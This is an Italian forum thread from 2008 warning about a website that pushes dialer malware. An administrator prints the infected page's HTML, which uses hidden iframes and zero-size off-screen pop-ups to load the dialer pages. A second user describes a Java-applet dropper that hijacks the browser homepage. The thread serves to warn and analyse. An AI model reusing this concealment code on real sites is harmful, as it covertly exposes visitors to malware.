Precedente :: Successivo |
Autore |
Messaggio |
bdoriano Amministratore
Registrato: 02/04/07 11:05 Messaggi: 14306 Residenza: 3° pianeta del sistema solare...
|
Inviato: 15 Giu 2008 14:38 Oggetto: [Virus] Attenzione al sito www.add-hhh.info |
|
|
Come da oggetto, tale sito contiene uno o più dialer che cercano di installarsi quando tentate di aprirlo.
Apre un paio di iframe e diversi pop-up in posizioni fuori schermo in modo di renderli invisibili.
Di seguito la finestra che viene visualizzata utilizzando Opera:
Sembra che i dialers siano ospitati sul sito w*w.charting.ws
Qui, invece, il codice html della pagina infetta:
Codice: | HTTP/1.1 200 OK
Date: Sun, 15 Jun 2008 13:19:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
Set-Cookie: start1=1213795144; expires=Fri, 27-Jun-2008 03:05:44 GMT
Content-Length: 1703
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>home page</title><meta http-equiv="pragma" content="no-cache"><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><meta http-equiv="refresh" content="300"></head><body >
<div style="visibility:hidden ; width:auto; height:10px;">
<iframe frameborder="0" src="/pop/win.php?rp=90000&ccmax=1&isp=1&nohtm=11&cc2=it"></iframe>
</div><script>
pop = "/pop/win.php?rt=10000&rp=200000&ccmax=2&cs=5098&isp=11&cc2=it";
var test_pop = window.open(pop,"pop1","resizable=0,width=0,copyhistory=no,height=0,left=10000,top=10000");
pop = "/pop/win.php?rt=40000&rp=300000&ccmax=2&cs=5098&isp=11&cc2=it";
var test_pop = window.open(pop,"pop2","resizable=0,width=0,copyhistory=no,height=0,left=10000,top=10000");
pop = "/pop/win.php?rt=60000&rp=600000&ccmax=2&cs=5098&isp=11&cc2=it";
var test_pop = window.open(pop,"pop3","resizable=0,width=0,copyhistory=no,height=0,left=10000,top=10000");
</script>
<iframe width="100%" height="1000" style="position:absolute; left:0; top:0;" frameborder="0" src="/pop/win.php?rt=50000&rp=200000&ccmax=2&cs=5098&isp=11" ></iframe>
<script language="javascript" type="text/javascript" src="/counter/counter.php?user=3241"></script>
<br><p align="left"><small>14-16.21</small></p>
<script language="javascript" type="application/javascript">
function writeCookie(name, value, hours)
{
var expire = "";
if(hours != null)
{
expire = new Date((new Date()).getTime() + hours * 3600000);
expire = "; expires=" + expire.toGMTString();
}
document.cookie = name + "=" + escape(value) + expire;
}
writeCookie("start1","1213795144",100000) ;
</script> |
|
|
Top |
|
|
daysleeper Semidio
Registrato: 24/04/08 23:01 Messaggi: 371
|
Inviato: 17 Giu 2008 09:15 Oggetto: |
|
|
Questo sito è uno dei casi più frequenti di modifica della home page del proprio browser(soprattutto ie).In pratica il tutto inizia da uno script imesso in sito web contenente un applet java,che se accettata,scarica un .exe responsabile appunto della comparsa di add-hhh.info come homepage,che al suo interno contiene tre link,che portano dritti dritti a tre dailer,quindi nel caso vi ritrovate questa home page,postate in pronto soccorso e non cliccate nulla!
I 3 dialer in questione:
analisi mcafee |
|
Top |
|
|
bdoriano Amministratore
Registrato: 02/04/07 11:05 Messaggi: 14306 Residenza: 3° pianeta del sistema solare...
|
Inviato: 18 Giu 2008 14:29 Oggetto: |
|
|
Oggi ho voluto provare alcune delle nuove features di FireFox 3...
Richiesta di autorizzazione per l'applet java:
Visualizzazione dei cookies lasciati dal sito virulento:
|
|
Top |
|
|
|
|
Non puoi inserire nuovi argomenti Non puoi rispondere a nessun argomento Non puoi modificare i tuoi messaggi Non puoi cancellare i tuoi messaggi Non puoi votare nei sondaggi
|
|